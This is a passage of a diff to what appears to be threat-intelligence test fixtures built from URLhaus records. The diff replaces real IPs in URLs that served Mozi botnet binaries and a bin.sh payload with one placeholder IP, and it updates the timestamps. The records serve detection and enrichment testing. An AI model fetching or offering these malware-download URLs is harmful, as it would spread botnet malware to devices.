- "original": "{\"id\":\"961152\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961152/\",\"url\":\"http://114.199.216.11:3553/Mozi.m\",\"url_status\":\"offline\",\"host\":\"114.199.216.11\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027336Z",
+ "original": "{\"id\":\"961152\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961152/\",\"url\":\"http://89.160.20.156:3553/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19094,18 +19094,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://112.241.208.20:35288/Mozi.a",
+ "original": "http://89.160.20.156:35288/Mozi.a",
 "scheme": "http",
 "port": 35288,
- "domain": "112.241.208.20",
- "full": "http://112.241.208.20:35288/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35288/Mozi.a"
 },
- "ip": "112.241.208.20"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693950754Z",
- "original": "{\"id\":\"961153\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961153/\",\"url\":\"http://112.241.208.20:35288/Mozi.a\",\"url_status\":\"online\",\"host\":\"112.241.208.20\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027343Z",
+ "original": "{\"id\":\"961153\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961153/\",\"url\":\"http://89.160.20.156:35288/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19142,18 +19142,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.104.10:46429/Mozi.m",
+ "original": "http://89.160.20.156:46429/Mozi.m",
 "scheme": "http",
 "port": 46429,
- "domain": "186.33.104.10",
- "full": "http://186.33.104.10:46429/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:46429/Mozi.m"
 },
- "ip": "186.33.104.10"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693956975Z",
- "original": "{\"id\":\"961154\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961154/\",\"url\":\"http://186.33.104.10:46429/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.10\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027349900Z",
+ "original": "{\"id\":\"961154\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961154/\",\"url\":\"http://89.160.20.156:46429/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19190,18 +19190,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.96.37.179:44575/Mozi.m",
+ "original": "http://89.160.20.156:44575/Mozi.m",
 "scheme": "http",
 "port": 44575,
- "domain": "59.96.37.179",
- "full": "http://59.96.37.179:44575/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:44575/Mozi.m"
 },
- "ip": "59.96.37.179"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693960792Z",
- "original": "{\"id\":\"961151\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961151/\",\"url\":\"http://59.96.37.179:44575/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.37.179\",\"date_added\":\"2021-01-14 18:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027356800Z",
+ "original": "{\"id\":\"961151\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961151/\",\"url\":\"http://89.160.20.156:44575/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19239,18 +19239,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://125.42.236.165:43245/Mozi.m",
+ "original": "http://89.160.20.156:43245/Mozi.m",
 "scheme": "http",
 "port": 43245,
- "domain": "125.42.236.165",
- "full": "http://125.42.236.165:43245/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43245/Mozi.m"
 },
- "ip": "125.42.236.165"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693964199Z",
- "original": "{\"id\":\"961149\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961149/\",\"url\":\"http://125.42.236.165:43245/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.42.236.165\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027364Z",
+ "original": "{\"id\":\"961149\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961149/\",\"url\":\"http://89.160.20.156:43245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19287,18 +19287,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.242.211.165:50444/Mozi.m",
+ "original": "http://89.160.20.156:50444/Mozi.m",
 "scheme": "http",
 "port": 50444,
- "domain": "117.242.211.165",
- "full": "http://117.242.211.165:50444/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50444/Mozi.m"
 },
- "ip": "117.242.211.165"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693967455Z",
- "original": "{\"id\":\"961150\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961150/\",\"url\":\"http://117.242.211.165:50444/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.242.211.165\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027370900Z",
+ "original": "{\"id\":\"961150\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961150/\",\"url\":\"http://89.160.20.156:50444/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19335,18 +19335,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.63.134.203:51318/Mozi.m",
+ "original": "http://89.160.20.156:51318/Mozi.m",
 "scheme": "http",
 "port": 51318,
- "domain": "115.63.134.203",
- "full": "http://115.63.134.203:51318/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51318/Mozi.m"
 },
- "ip": "115.63.134.203"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693971202Z",
- "original": "{\"id\":\"961144\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961144/\",\"url\":\"http://115.63.134.203:51318/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.134.203\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027377800Z",
+ "original": "{\"id\":\"961144\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961144/\",\"url\":\"http://89.160.20.156:51318/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19384,18 +19384,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.4.89.190:46221/Mozi.m",
+ "original": "http://89.160.20.156:46221/Mozi.m",
 "scheme": "http",
 "port": 46221,
- "domain": "123.4.89.190",
- "full": "http://123.4.89.190:46221/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:46221/Mozi.m"
 },
- "ip": "123.4.89.190"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693974458Z",
- "original": "{\"id\":\"961145\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961145/\",\"url\":\"http://123.4.89.190:46221/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.4.89.190\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027384700Z",
+ "original": "{\"id\":\"961145\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961145/\",\"url\":\"http://89.160.20.156:46221/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19433,18 +19433,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.9.108.157:51430/Mozi.m",
+ "original": "http://89.160.20.156:51430/Mozi.m",
 "scheme": "http",
 "port": 51430,
- "domain": "123.9.108.157",
- "full": "http://123.9.108.157:51430/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51430/Mozi.m"
 },
- "ip": "123.9.108.157"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693977884Z",
- "original": "{\"id\":\"961146\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961146/\",\"url\":\"http://123.9.108.157:51430/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.108.157\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027391600Z",
+ "original": "{\"id\":\"961146\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961146/\",\"url\":\"http://89.160.20.156:51430/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19482,18 +19482,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.48.160.11:52028/Mozi.m",
+ "original": "http://89.160.20.156:52028/Mozi.m",
 "scheme": "http",
 "port": 52028,
- "domain": "115.48.160.11",
- "full": "http://115.48.160.11:52028/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52028/Mozi.m"
 },
- "ip": "115.48.160.11"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693981231Z",
- "original": "{\"id\":\"961147\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961147/\",\"url\":\"http://115.48.160.11:52028/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.160.11\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027398500Z",
+ "original": "{\"id\":\"961147\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961147/\",\"url\":\"http://89.160.20.156:52028/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19531,18 +19531,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://125.44.61.35:48291/Mozi.a",
+ "original": "http://89.160.20.156:48291/Mozi.a",
 "scheme": "http",
 "port": 48291,
- "domain": "125.44.61.35",
- "full": "http://125.44.61.35:48291/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48291/Mozi.a"
 },
- "ip": "125.44.61.35"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693984487Z",
- "original": "{\"id\":\"961148\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961148/\",\"url\":\"http://125.44.61.35:48291/Mozi.a\",\"url_status\":\"online\",\"host\":\"125.44.61.35\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027405500Z",
+ "original": "{\"id\":\"961148\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961148/\",\"url\":\"http://89.160.20.156:48291/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19579,18 +19579,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://202.164.138.170:39613/Mozi.m",
+ "original": "http://89.160.20.156:39613/Mozi.m",
 "scheme": "http",
 "port": 39613,
- "domain": "202.164.138.170",
- "full": "http://202.164.138.170:39613/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:39613/Mozi.m"
 },
- "ip": "202.164.138.170"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693987823Z",
- "original": "{\"id\":\"961143\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961143/\",\"url\":\"http://202.164.138.170:39613/Mozi.m\",\"url_status\":\"offline\",\"host\":\"202.164.138.170\",\"date_added\":\"2021-01-14 18:04:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027467600Z",
+ "original": "{\"id\":\"961143\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961143/\",\"url\":\"http://89.160.20.156:39613/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19629,18 +19629,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://219.154.108.170:34201/bin.sh",
+ "original": "http://89.160.20.156:34201/bin.sh",
 "scheme": "http",
 "port": 34201,
- "domain": "219.154.108.170",
- "full": "http://219.154.108.170:34201/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34201/bin.sh"
 },
- "ip": "219.154.108.170"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693991029Z",
- "original": "{\"id\":\"961142\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961142/\",\"url\":\"http://219.154.108.170:34201/bin.sh\",\"url_status\":\"online\",\"host\":\"219.154.108.170\",\"date_added\":\"2021-01-14 17:56:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.027478700Z",
+ "original": "{\"id\":\"961142\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961142/\",\"url\":\"http://89.160.20.156:34201/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:56:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19678,18 +19678,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://220.135.95.248:47095/Mozi.a",
+ "original": "http://89.160.20.156:47095/Mozi.a",
 "scheme": "http",
 "port": 47095,
- "domain": "220.135.95.248",
- "full": "http://220.135.95.248:47095/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47095/Mozi.a"
 },
- "ip": "220.135.95.248"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693994105Z",
- "original": "{\"id\":\"961141\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961141/\",\"url\":\"http://220.135.95.248:47095/Mozi.a\",\"url_status\":\"online\",\"host\":\"220.135.95.248\",\"date_added\":\"2021-01-14 17:53:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027486300Z",
+ "original": "{\"id\":\"961141\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961141/\",\"url\":\"http://89.160.20.156:47095/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19727,18 +19727,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.239.154.85:42004/Mozi.m",
+ "original": "http://89.160.20.156:42004/Mozi.m",
 "scheme": "http",
 "port": 42004,
- "domain": "42.239.154.85",
- "full": "http://42.239.154.85:42004/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:42004/Mozi.m"
 },
- "ip": "42.239.154.85"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693997141Z",
- "original": "{\"id\":\"961136\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961136/\",\"url\":\"http://42.239.154.85:42004/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.239.154.85\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027493300Z",
+ "original": "{\"id\":\"961136\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961136/\",\"url\":\"http://89.160.20.156:42004/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19776,18 +19776,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://27.203.185.42:52058/Mozi.m",
+ "original": "http://89.160.20.156:52058/Mozi.m",
 "scheme": "http",
 "port": 52058,
- "domain": "27.203.185.42",
- "full": "http://27.203.185.42:52058/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52058/Mozi.m"
 },
- "ip": "27.203.185.42"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694000427Z",
- "original": "{\"id\":\"961137\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961137/\",\"url\":\"http://27.203.185.42:52058/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.203.185.42\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027500200Z",
+ "original": "{\"id\":\"961137\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961137/\",\"url\":\"http://89.160.20.156:52058/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19825,18 +19825,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://39.80.186.173:45432/Mozi.m",
+ "original": "http://89.160.20.156:45432/Mozi.m",
 "scheme": "http",
 "port": 45432,
- "domain": "39.80.186.173",
- "full": "http://39.80.186.173:45432/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:45432/Mozi.m"
 },
- "ip": "39.80.186.173"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694003643Z",
- "original": "{\"id\":\"961138\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961138/\",\"url\":\"http://39.80.186.173:45432/Mozi.m\",\"url_status\":\"online\",\"host\":\"39.80.186.173\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027507200Z",
+ "original": "{\"id\":\"961138\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961138/\",\"url\":\"http://89.160.20.156:45432/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19874,18 +19874,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://61.52.34.132:49891/Mozi.m",
+ "original": "http://89.160.20.156:49891/Mozi.m",
 "scheme": "http",
 "port": 49891,
- "domain": "61.52.34.132",
- "full": "http://61.52.34.132:49891/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49891/Mozi.m"
 },
- "ip": "61.52.34.132"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694006749Z",
- "original": "{\"id\":\"961139\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961139/\",\"url\":\"http://61.52.34.132:49891/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.34.132\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027514Z",
+ "original": "{\"id\":\"961139\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961139/\",\"url\":\"http://89.160.20.156:49891/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19923,18 +19923,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://61.54.41.216:34334/Mozi.m",
+ "original": "http://89.160.20.156:34334/Mozi.m",
 "scheme": "http",
 "port": 34334,
- "domain": "61.54.41.216",
- "full": "http://61.54.41.216:34334/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34334/Mozi.m"
 },
- "ip": "61.54.41.216"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694010045Z",
